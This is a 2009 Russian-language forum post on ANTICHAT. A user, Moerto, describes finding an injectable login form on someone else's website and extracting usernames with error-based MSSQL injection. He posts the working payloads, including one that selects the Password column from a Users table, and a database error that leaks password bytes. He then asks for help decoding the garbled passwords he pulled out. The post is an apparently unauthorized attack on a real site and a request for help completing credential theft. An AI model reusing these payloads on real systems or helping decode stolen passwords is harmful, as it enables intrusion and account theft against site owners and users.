HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу mssql injection
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

mssql injection
  #1  
Старый 01.08.2009, 00:25
Moerto
Новичок
Регистрация: 22.07.2009
Сообщений: 7
С нами: 8845571

Репутация: 0
По умолчанию mssql injection
Привет, у меня проблема с mssql инйэкцию. Я в один сайт нашол "vulnerable" (ньезнаю как ето сказать по руски) логин форму. Я палучил юзернеими и другую информацию от датабази с такие команди:
Код:
' and 1=convert(int, (select top 1...))--
Когда я хачу палучиц парольи с такую методу я палучаю такие парольи - ÅÆÅÆ .
Код:
' and 1=convert(varchar, (select top 1 Password from Users where Username='foundusername'))--
Код:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'  [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'ª·¨©»¯ ' to a column of data type int.
Парольи можно быть в арабиц енкодинг, я попробовал поменьять бровсер енкодинг и без прогреса. Спасибо.
P.S. Я неоченъ харашо гаварю по руски, извиньице.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
mssql injection pop_korn Video.Antichat 0 07.02.2007 14:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.